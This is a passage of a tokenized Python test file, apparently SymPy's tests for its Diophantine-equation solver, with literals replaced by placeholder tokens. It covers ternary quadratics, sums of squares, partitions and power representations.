<NUM_LIT:2> ) == ( <NUM_LIT:1> , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> assert diop_ternary_quadratic ( x * y + <NUM_LIT:2> * y * z ) == ( - <NUM_LIT:2> , <NUM_LIT:0> , n1 ) <EOL> eq = - <NUM_LIT:5> * x * y - <NUM_LIT:8> * x * z - <NUM_LIT:3> * y * z + <NUM_LIT:8> * z ** <NUM_LIT:2> <EOL> assert parametrize_ternary_quadratic ( eq ) == ( <NUM_LIT:64> * p ** <NUM_LIT:2> - <NUM_LIT> * p * q , - <NUM_LIT:64> * p * q + <NUM_LIT:64> * q ** <NUM_LIT:2> , <NUM_LIT> * p * q ) <EOL> assert diop_solve ( x * y + <NUM_LIT:2> * y * z ) == ( - <NUM_LIT:4> * p * q , - <NUM_LIT:2> * n1 * p ** <NUM_LIT:2> + <NUM_LIT:2> * p ** <NUM_LIT:2> , <NUM_LIT:2> * p * q ) <EOL> def test_square_factor ( ) : <EOL> assert square_factor ( <NUM_LIT:1> ) == square_factor ( - <NUM_LIT:1> ) == <NUM_LIT:1> <EOL> assert square_factor ( <NUM_LIT:0> ) == <NUM_LIT:1> <EOL> assert square_factor ( <NUM_LIT:5> ) == square_factor ( - <NUM_LIT:5> ) == <NUM_LIT:1> <EOL> assert square_factor ( <NUM_LIT:4> ) == square_factor ( - <NUM_LIT:4> ) == <NUM_LIT:2> <EOL> assert square_factor ( <NUM_LIT:12> ) == square_factor ( - <NUM_LIT:12> ) == <NUM_LIT:2> <EOL> assert square_factor ( <NUM_LIT:6> ) == <NUM_LIT:1> <EOL> assert square_factor ( <NUM_LIT> ) == <NUM_LIT:3> <EOL> assert square_factor ( <NUM_LIT> ) == <NUM_LIT:2> <EOL> assert square_factor ( <NUM_LIT> ) == <NUM_LIT:7> <EOL> assert square_factor ( <NUM_LIT> ) == <NUM_LIT> <EOL> assert square_factor ( factorint ( - <NUM_LIT:12> ) ) == <NUM_LIT:2> <EOL> def test_parametrize_ternary_quadratic ( ) : <EOL> assert check_solutions ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> + <NUM_LIT:2> * x * y + z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:3> * x ** <NUM_LIT:2> + <NUM_LIT:2> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> - <NUM_LIT:2> * x * y + <NUM_LIT:5> * y * z - <NUM_LIT:7> * y * z ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> + <NUM_LIT> * z * y - <NUM_LIT:8> * x * y ) <EOL> assert check_solutions ( <NUM_LIT:8> * x * y + z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT:30> * y ** <NUM_LIT:2> - <NUM_LIT> * z ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT> * y ** <NUM_LIT:2> - <NUM_LIT:11> * x * y - <NUM_LIT> * y * z - <NUM_LIT> * x * z ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> + <NUM_LIT:5> * x * y + <NUM_LIT:2> * z * y + <NUM_LIT:5> * x * z ) <EOL> assert check_solutions ( <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT:30> * y ** <NUM_LIT:2> - <NUM_LIT> * z ** <NUM_LIT:2> ) <EOL> def test_no_square_ternary_quadratic ( ) : <EOL> assert check_solutions ( <NUM_LIT:2> * x * y + y * z - <NUM_LIT:3> * x * z ) <EOL> assert check_solutions ( <NUM_LIT> * x * y - <NUM_LIT> * y * z - <NUM_LIT:12> * x * z ) <EOL> assert check_solutions ( <NUM_LIT> * x * y + <NUM_LIT> * y * z ) <EOL> assert check_solutions ( x * y + y * z + z * x ) <EOL> assert check_solutions ( <NUM_LIT> * x * y + <NUM_LIT> * y * z + <NUM_LIT> * x * z ) <EOL> def test_descent ( ) : <EOL> u = ( [ ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT:3> , - <NUM_LIT:11> ) , ( <NUM_LIT> , - <NUM_LIT> ) , ( <NUM_LIT> , - <NUM_LIT:3> ) , ( <NUM_LIT:1> , <NUM_LIT:1> ) , ( <NUM_LIT:1> , - <NUM_LIT:1> ) , ( <NUM_LIT> , <NUM_LIT> ) , ( <NUM_LIT> , <NUM_LIT:1> ) , ( <NUM_LIT> , - <NUM_LIT> ) ] ) <EOL> for a , b in u : <EOL> w , x , y = descent ( a , b ) <EOL> assert a * x ** <NUM_LIT:2> + b * y ** <NUM_LIT:2> == w ** <NUM_LIT:2> <EOL> raises ( TypeError , lambda : descent ( - <NUM_LIT:1> , - <NUM_LIT:3> ) ) <EOL> raises ( ZeroDivisionError , lambda : descent ( <NUM_LIT:0> , <NUM_LIT:3> ) ) <EOL> raises ( TypeError , lambda : descent ( <NUM_LIT:4> , <NUM_LIT:3> ) ) <EOL> def test_diophantine ( ) : <EOL> assert check_solutions ( ( x - y ) * ( y - z ) * ( z - x ) ) <EOL> assert check_solutions ( ( x - y ) * ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) ) <EOL> assert check_solutions ( ( x - <NUM_LIT:3> * y + <NUM_LIT:7> * z ) * ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) ) <EOL> assert check_solutions ( ( x ** <NUM_LIT:2> - <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:1> ) ) <EOL> assert check_solutions ( y ** <NUM_LIT:2> + <NUM_LIT:7> * x * y ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT:3> * x * y + y ** <NUM_LIT:2> ) <EOL> assert check_solutions ( z * ( x ** <NUM_LIT:2> - y ** <NUM_LIT:2> - <NUM_LIT:15> ) ) <EOL> assert check_solutions ( x * ( <NUM_LIT:2> * y - <NUM_LIT:2> * z + <NUM_LIT:5> ) ) <EOL> assert check_solutions ( ( x ** <NUM_LIT:2> - <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:1> ) * ( x ** <NUM_LIT:2> - y ** <NUM_LIT:2> - <NUM_LIT:15> ) ) <EOL> assert check_solutions ( ( x ** <NUM_LIT:2> - <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:1> ) * ( y - <NUM_LIT:7> * z ) ) <EOL> assert check_solutions ( ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) * ( x - <NUM_LIT:7> * y - <NUM_LIT:3> * z + <NUM_LIT:4> * w ) ) <EOL> assert check_solutions ( y ** <NUM_LIT:2> - <NUM_LIT:7> * x * y + <NUM_LIT:4> * y * z ) <EOL> assert check_solutions ( x ** <NUM_LIT:2> - <NUM_LIT:2> * x + <NUM_LIT:1> ) <EOL> assert diophantine ( x - y ) == diophantine ( Eq ( x , y ) ) <EOL> assert diophantine ( <NUM_LIT:3> * x * pi - <NUM_LIT:2> * y * pi ) == set ( [ ( <NUM_LIT:2> * t_0 , <NUM_LIT:3> * t_0 ) ] ) <EOL> assert diophantine ( x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - <NUM_LIT> ) == set ( [ ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ] ) <EOL> assert diophantine ( x ** <NUM_LIT:2> + <NUM_LIT:15> * x / <NUM_LIT> - <NUM_LIT:3> ) == set ( ) <EOL> eq = <NUM_LIT> * x ** <NUM_LIT:2> - <NUM_LIT> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> <EOL> coeff = eq . as_coefficients_dict ( ) <EOL> assert _diop_ternary_quadratic_normal ( ( x , y , z ) , coeff ) == ( <NUM_LIT:9> , <NUM_LIT:7> , <NUM_LIT> ) <EOL> assert diophantine ( eq ) == set ( [ ( <EOL> <NUM_LIT> * p ** <NUM_LIT:2> + <NUM_LIT:9> * q ** <NUM_LIT:2> , - <NUM_LIT> * p ** <NUM_LIT:2> - <NUM_LIT> * p * q + <NUM_LIT:7> * q ** <NUM_LIT:2> , <EOL> <NUM_LIT> * p ** <NUM_LIT:2> - <NUM_LIT> * p * q - <NUM_LIT> * q ** <NUM_LIT:2> ) ] ) <EOL> eq = <NUM_LIT:2> * x ** <NUM_LIT:2> + <NUM_LIT:2> * y ** <NUM_LIT:2> - z ** <NUM_LIT:2> <EOL> coeff = eq . as_coefficients_dict ( ) <EOL> assert _diop_ternary_quadratic_normal ( ( x , y , z ) , coeff ) == ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> assert diophantine ( eq ) == set ( [ ( <EOL> <NUM_LIT:2> * p ** <NUM_LIT:2> - q ** <NUM_LIT:2> , - <NUM_LIT:2> * p ** <NUM_LIT:2> + <NUM_LIT:4> * p * q - q ** <NUM_LIT:2> , <EOL> <NUM_LIT:4> * p ** <NUM_LIT:2> - <NUM_LIT:4> * p * q + <NUM_LIT:2> * q ** <NUM_LIT:2> ) ] ) <EOL> eq = <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT> * y ** <NUM_LIT:2> - <NUM_LIT> * z ** <NUM_LIT:2> <EOL> coeff = eq . as_coefficients_dict ( ) <EOL> assert _diop_ternary_quadratic_normal ( ( x , y , z ) , coeff ) == ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> assert diophantine ( eq ) == set ( [ ( <NUM_LIT> * p ** <NUM_LIT:2> - <NUM_LIT> * q ** <NUM_LIT:2> , - <NUM_LIT> * p ** <NUM_LIT:2> + <NUM_LIT> * p * q - <EOL> <NUM_LIT> * q ** <NUM_LIT:2> , <NUM_LIT> * p ** <NUM_LIT:2> - <NUM_LIT> * p * q + <NUM_LIT> * q ** <NUM_LIT:2> ) ] ) <EOL> eq = <NUM_LIT> * x ** <NUM_LIT:2> + <NUM_LIT> * y ** <NUM_LIT:2> - <NUM_LIT> * z ** <NUM_LIT:2> <EOL> coeff = eq . as_coefficients_dict ( ) <EOL> assert _diop_ternary_quadratic_normal ( ( x , y , z ) , coeff ) == ( <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) <EOL> assert diophantine ( eq ) == set ( [ ( <NUM_LIT> * p ** <NUM_LIT:2> - <NUM_LIT> * q ** <NUM_LIT:2> , - <NUM_LIT> * p ** <NUM_LIT:2> + <NUM_LIT> * p * q - <NUM_LIT> * q ** <NUM_LIT:2> , <EOL> <NUM_LIT> * p ** <NUM_LIT:2> - <NUM_LIT> * p * q + <NUM_LIT> * q ** <NUM_LIT:2> ) ] ) <EOL> eq = x ** <NUM_LIT:2> + <NUM_LIT:3> * y ** <NUM_LIT:2> - <NUM_LIT:12> * z ** <NUM_LIT:2> <EOL> coeff = eq . as_coefficients_dict ( ) <EOL> assert _diop_ternary_quadratic_normal ( ( x , y , z ) , coeff ) == ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:1> ) <EOL> assert diophantine ( eq ) == set ( [ ( <NUM_LIT> * p * q , <NUM_LIT:2> * p ** <NUM_LIT:2> - <NUM_LIT> * q ** <NUM_LIT:2> , p ** <NUM_LIT:2> + <NUM_LIT:12> * q ** <NUM_LIT:2> ) ] ) <EOL> raises ( NotImplementedError , lambda : diophantine ( x * y ** <NUM_LIT:2> + <NUM_LIT:1> ) ) <EOL> assert diophantine ( <NUM_LIT:1> / x ) == set ( ) <EOL> assert diophantine ( <NUM_LIT:1> / x + <NUM_LIT:1> / y - S . Half ) <EOL> set ( [ ( <NUM_LIT:6> , <NUM_LIT:3> ) , ( - <NUM_LIT:2> , <NUM_LIT:1> ) , ( <NUM_LIT:4> , <NUM_LIT:4> ) , ( <NUM_LIT:1> , - <NUM_LIT:2> ) , ( <NUM_LIT:3> , <NUM_LIT:6> ) ] ) <EOL> def test_general_pythagorean ( ) : <EOL> from sympy . abc import a , b , c , d , e <EOL> assert check_solutions ( a ** <NUM_LIT:2> + b ** <NUM_LIT:2> + c ** <NUM_LIT:2> - d ** <NUM_LIT:2> ) <EOL> assert check_solutions ( a ** <NUM_LIT:2> + <NUM_LIT:4> * b ** <NUM_LIT:2> + <NUM_LIT:4> * c ** <NUM_LIT:2> - d ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:9> * a ** <NUM_LIT:2> + <NUM_LIT:4> * b ** <NUM_LIT:2> + <NUM_LIT:4> * c ** <NUM_LIT:2> - d ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:9> * a ** <NUM_LIT:2> + <NUM_LIT:4> * b ** <NUM_LIT:2> - <NUM_LIT> * d ** <NUM_LIT:2> + <NUM_LIT:4> * c ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:9> * a ** <NUM_LIT:2> - <NUM_LIT:16> * d ** <NUM_LIT:2> + <NUM_LIT:4> * b ** <NUM_LIT:2> + <NUM_LIT:4> * c ** <NUM_LIT:2> ) <EOL> assert check_solutions ( - e ** <NUM_LIT:2> + <NUM_LIT:9> * a ** <NUM_LIT:2> + <NUM_LIT:4> * b ** <NUM_LIT:2> + <NUM_LIT:4> * c ** <NUM_LIT:2> + <NUM_LIT> * d ** <NUM_LIT:2> ) <EOL> assert check_solutions ( <NUM_LIT:16> * a ** <NUM_LIT:2> - b ** <NUM_LIT:2> + <NUM_LIT:9> * c ** <NUM_LIT:2> + d ** <NUM_LIT:2> + <NUM_LIT> * e ** <NUM_LIT:2> ) <EOL> def test_diop_general_sum_of_squares_quick ( ) : <EOL> for i in range ( <NUM_LIT:3> , <NUM_LIT:10> ) : <EOL> assert check_solutions ( sum ( i ** <NUM_LIT:2> for i in symbols ( '<STR_LIT>' % i ) ) - i ) <EOL> raises ( ValueError , lambda : _diop_general_sum_of_squares ( ( x , y ) , <NUM_LIT:2> ) ) <EOL> assert _diop_general_sum_of_squares ( ( x , y , z ) , - <NUM_LIT:2> ) == set ( ) <EOL> eq = x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - ( <NUM_LIT:1> + <NUM_LIT:4> + <NUM_LIT:9> ) <EOL> assert diop_general_sum_of_squares ( eq ) == set ( [ ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) ] ) <EOL> eq = u ** <NUM_LIT:2> + v ** <NUM_LIT:2> + x ** <NUM_LIT:2> + y ** <NUM_LIT:2> + z ** <NUM_LIT:2> - <NUM_LIT> <EOL> assert len ( diop_general_sum_of_squares ( eq , <NUM_LIT:3> ) ) == <NUM_LIT:3> <EOL> var = symbols ( '<STR_LIT>' ) + ( symbols ( '<STR_LIT>' , negative = True ) , ) <EOL> eq = Add ( * [ i ** <NUM_LIT:2> for i in var ] ) - <NUM_LIT> <EOL> assert diophantine ( eq ) == set ( <EOL> [ ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:6> , - <NUM_LIT:7> ) , ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:6> , - <NUM_LIT:8> ) , ( <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:4> , <EOL> <NUM_LIT:5> , - <NUM_LIT:7> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , - <NUM_LIT:10> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:4> , - <NUM_LIT:8> ) , ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <EOL> <NUM_LIT:3> , <NUM_LIT:5> , - <NUM_LIT:8> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:7> , - <NUM_LIT:7> ) , ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:6> , - <NUM_LIT:6> ) , ( <NUM_LIT:1> , <NUM_LIT:1> , <EOL> <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:6> , - <NUM_LIT:7> ) , ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , - <NUM_LIT:9> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , - <NUM_LIT:10> ) , ( <NUM_LIT:1> , <EOL> <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:4> , - <NUM_LIT:9> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:5> , - <NUM_LIT:9> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:6> , <NUM_LIT:6> , - <NUM_LIT:6> ) , <EOL> ( <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:4> , <NUM_LIT:5> , <NUM_LIT:5> , - <NUM_LIT:6> ) , ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:6> , - <NUM_LIT:8> ) , ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:3> , <NUM_LIT:6> , <EOL> - <NUM_LIT:7> ) , ( <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:5> , - <NUM_LIT:7> ) , ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:5> , <NUM_LIT:5> , <NUM_LIT:5> , - <NUM_LIT:6> ) ] ) <EOL> assert diophantine ( <NUM_LIT:12> - x ** <NUM_LIT:2> - y ** <NUM_LIT:2> - z ** <NUM_LIT:2> ) == set ( [ ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ) ] ) <EOL> eq = a ** <NUM_LIT:2> + b ** <NUM_LIT:2> + c ** <NUM_LIT:2> + d ** <NUM_LIT:2> - <NUM_LIT:4> <EOL> raises ( NotImplementedError , lambda : classify_diop ( - eq ) ) <EOL> def test_diop_partition ( ) : <EOL> for n in [ <NUM_LIT:8> , <NUM_LIT:10> ] : <EOL> for k in range ( <NUM_LIT:1> , <NUM_LIT:8> ) : <EOL> for p in partition ( n , k ) : <EOL> assert len ( p ) == k <EOL> assert [ p for p in partition ( <NUM_LIT:3> , <NUM_LIT:5> ) ] == [ ] <EOL> assert [ list ( p ) for p in partition ( <NUM_LIT:3> , <NUM_LIT:5> , <NUM_LIT:1> ) ] == [ <EOL> [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] ] <EOL> assert list ( partition ( <NUM_LIT:0> ) ) == [ ( ) ] <EOL> assert list ( partition ( <NUM_LIT:1> , <NUM_LIT:0> ) ) == [ ( ) ] <EOL> assert [ list ( i ) for i in partition ( <NUM_LIT:3> ) ] == [ [ <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ] , [ <NUM_LIT:1> , <NUM_LIT:2> ] , [ <NUM_LIT:3> ] ] <EOL> def test_prime_as_sum_of_two_squares ( ) : <EOL> for i in [ <NUM_LIT:5> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> a , b = prime_as_sum_of_two_squares ( i ) <EOL> assert a ** <NUM_LIT:2> + b ** <NUM_LIT:2> == i <EOL> assert prime_as_sum_of_two_squares ( <NUM_LIT:7> ) is None <EOL> ans = prime_as_sum_of_two_squares ( <NUM_LIT> ) <EOL> assert ans == ( <NUM_LIT> , <NUM_LIT> ) and type ( ans [ <NUM_LIT:0> ] ) is int <EOL> def test_sum_of_three_squares ( ) : <EOL> for i in [ <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ] : <EOL> a , b , c = sum_of_three_squares ( i ) <EOL> assert a ** <NUM_LIT:2> + b ** <NUM_LIT:2> + c ** <NUM_LIT:2> == i <EOL> assert sum_of_three_squares ( <NUM_LIT:7> ) is None <EOL> assert sum_of_three_squares ( ( <NUM_LIT:4> ** <NUM_LIT:5> ) * <NUM_LIT:15> ) is None <EOL> assert sum_of_three_squares ( <NUM_LIT> ) == ( <NUM_LIT:5> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> assert sum_of_three_squares ( <NUM_LIT:4> ) == ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> def test_sum_of_four_squares ( ) : <EOL> from random import randint <EOL> n = randint ( <NUM_LIT:1> , <NUM_LIT> ) <EOL> assert sum ( i ** <NUM_LIT:2> for i in sum_of_four_squares ( n ) ) == n <EOL> assert sum_of_four_squares ( <NUM_LIT:0> ) == ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> assert sum_of_four_squares ( <NUM_LIT> ) == ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> assert sum_of_four_squares ( <NUM_LIT:15> ) == ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> assert sum_of_four_squares ( <NUM_LIT> ) == ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:3> ) <EOL> assert sum_of_four_squares ( <NUM_LIT> ) == ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> ) <EOL> assert sum_of_four_squares ( <NUM_LIT> ) == ( <NUM_LIT:0> , <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:4> ) <EOL> def test_power_representation ( ) : <EOL> tests = [ ( <NUM_LIT> , <NUM_LIT:3> , <NUM_LIT:2> ) , ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:4> ) , ( <NUM_LIT:2> , <NUM_LIT:1> , <NUM_LIT:2> ) , ( <NUM_LIT:3> , <NUM_LIT:1> , <NUM_LIT:3> ) , ( <NUM_LIT:5> , <NUM_LIT:2> , <NUM_LIT:2> ) , ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:4> ) , <EOL> ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:3> ) ] <EOL> for test in tests : <EOL> n , p , k = test <EOL> f = power_representation ( n , p , k ) <EOL> while True : <EOL> try : <EOL> l = next ( f ) <EOL> assert len ( l ) == k <EOL> chk_sum = <NUM_LIT:0> <EOL> for l_i in l : <EOL> chk_sum = chk_sum + l_i ** p <EOL> assert chk_sum == n <EOL> except StopIteration : <EOL> break <EOL> assert list ( power_representation ( <NUM_LIT:20> , <NUM_LIT:2> , <NUM_LIT:4> , True ) ) == [ ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:3> , <NUM_LIT:3> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:2> , <NUM_LIT:4> ) ] <EOL> raises ( ValueError , lambda : list ( power_representation ( <NUM_LIT> , <NUM_LIT:2> , <NUM_LIT:2> ) ) ) <EOL> raises ( ValueError , lambda : list ( power_representation ( <NUM_LIT:2> , <NUM_LIT:0> , <NUM_LIT:2> ) ) ) <EOL> raises ( ValueError , lambda : list ( power_representation ( <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:0> ) ) ) <EOL> assert list ( power_representation ( - <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> ) ) == [ ] <EOL> assert list ( power_representation ( <NUM_LIT:1> , <NUM_LIT:1> , <NUM_LIT:1> ) ) == [ ( <NUM_LIT:1> , ) ] <EOL> assert list ( power_representation ( <NUM_LIT:3> , <NUM_LIT:2> , <NUM_LIT:1> ) ) == [ ] <EOL> assert list ( power_representation ( <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:1> ) ) == [ ( <NUM_LIT:2> , ) ] <EOL> assert list ( power_representation ( <NUM_LIT:3> ** <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:6> , zeros = True ) ) == [ ( <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> , <NUM_LIT:2> ) , ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:3> ) ] <EOL> assert list ( power_representation ( <NUM_LIT:3> ** <NUM_LIT:4> , <NUM_LIT:4> , <NUM_LIT:5> , zeros = False ) ) == [ ] <EOL> assert list ( power_representation ( - <NUM_LIT:2> , <NUM_LIT:3> , <NUM_LIT:2> ) ) == [ ( - <NUM_LIT:1> , - <NUM_LIT:1> ) ] <EOL> assert list ( power_representation ( - <NUM_LIT:2> , <NUM_LIT:4> , <NUM_LIT:2> ) ) == [ ] <EOL> assert list ( power_representation ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> , True ) ) == [ ( <NUM_LIT:0> , <NUM_LIT:0> ) ] <EOL> assert list ( power_representation ( <NUM_LIT:0> , <NUM_LIT:3> , <NUM_LIT:2> , False ) ) == [ ] <EOL> assert len ( list ( power_representation ( <NUM_LIT:4> ** <NUM_LIT:10> * ( <NUM_LIT:8> * <NUM_LIT:10> + <NUM_LIT:7> ) , <NUM_LIT:2> , <NUM_LIT:3> ) ) ) == <NUM_LIT:0> <EOL> big = <NUM_LIT:2> ** <NUM_LIT:30> <EOL> for i in [ <NUM_LIT> , <NUM_LIT:10> , <NUM_LIT:7> , <NUM_LIT:5> , <NUM_LIT:4> , <NUM_LIT:2> , <NUM_LIT:1> ] : <EOL> assert list ( sum_of_powers ( big , <NUM_LIT:2> , big - i ) ) == [ ] <EOL> def test_assumptions ( ) : <EOL> """<STR_LIT>""" <EOL> m , n = symbols ( '<STR_LIT>' , integer = True , positive = True ) <EOL> diof = diophantine ( n ** <NUM_LIT:2> + m * n - <NUM_LIT> ) <EOL> assert diof == set ( [ ( <NUM_LIT:5> , <NUM_LIT:20> ) , ( <NUM_LIT> , <NUM_LIT:10> ) , ( <NUM_LIT> , <NUM_LIT:5> ) , ( <NUM_LIT> , <NUM_LIT:4> ) , ( <NUM_LIT> , <NUM_LIT:2> ) , ( <NUM_LIT> , <NUM_LIT:1> ) ] ) <EOL> a , b = symbols ( '<STR_LIT>' , integer = True , positive = False ) <EOL> diof = diophantine ( a * b + <NUM_LIT:2> * a + <NUM_LIT:3> * b - <NUM_LIT:6> ) <EOL> assert diof == set ( [ ( - <NUM_LIT:15> , - <NUM_LIT:3> ) , ( - <NUM_LIT:9> , - <NUM_LIT:4> ) , ( - <NUM_LIT:7> , - <NUM_LIT:5> ) , ( - <NUM_LIT:6> , - <NUM_LIT:6> ) , ( - <NUM_LIT:5> , - <NUM_LIT:8> ) , ( - <NUM_LIT:4> , - <NUM_LIT> ) ] ) <EOL> def check_solutions ( eq ) : <EOL> """<STR_LIT>""" <EOL> s = diophantine ( eq ) <EOL> factors = Mul . make_args ( eq ) <EOL> var = list ( eq . free_symbols ) <EOL> var . sort ( key = default_sort_key ) <EOL> while s : <EOL> solution = s . pop ( ) <EOL> for f in factors : <EOL> if diop_simplify ( f . subs ( zip ( var , solution ) ) ) == <NUM_LIT:0> : <EOL> break <EOL> else : <EOL> return False <EOL> return True <EOL> def test_diopcoverage ( ) : <EOL> eq = ( <NUM_LIT:2> * x + y + <NUM_LIT:1> ) ** <NUM_LIT:2> <EOL> assert diop_solve ( eq ) == set ( [ ( t_0 , - <NUM_LIT:2> * t_0 - <NUM_LIT:1> ) ] ) <EOL> eq = <NUM_LIT:2> * x ** <NUM_LIT:2> + <NUM_LIT:6> * x * y + <NUM_LIT:12> * x + <NUM_LIT:4> * y ** <NUM_LIT:2> + <NUM_LIT> * y + <NUM_LIT> <EOL> assert diop_solve ( eq ) == set ( [ ( t_0 , - t_0 - <NUM_LIT:3> ) , ( <NUM_LIT:2> * t_0 - <NUM_LIT:3> , - t_0 ) ] ) <EOL> assert diop_quadratic ( x + y ** <NUM_LIT:2> - <NUM_LIT:3> ) == set ( [ ( - t ** <NUM_LIT:2> + <NUM_LIT:3> , - t ) ] ) <EOL> assert diop_linear ( x + y - <NUM_LIT:3> ) == ( t_0 , <NUM_LIT:3> - t_0 ) <EOL> assert base_solution_linear ( <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> , t = None ) == ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> ans = ( <NUM_LIT:3> * t - <NUM_LIT:1> , - <NUM_LIT:2> * t + 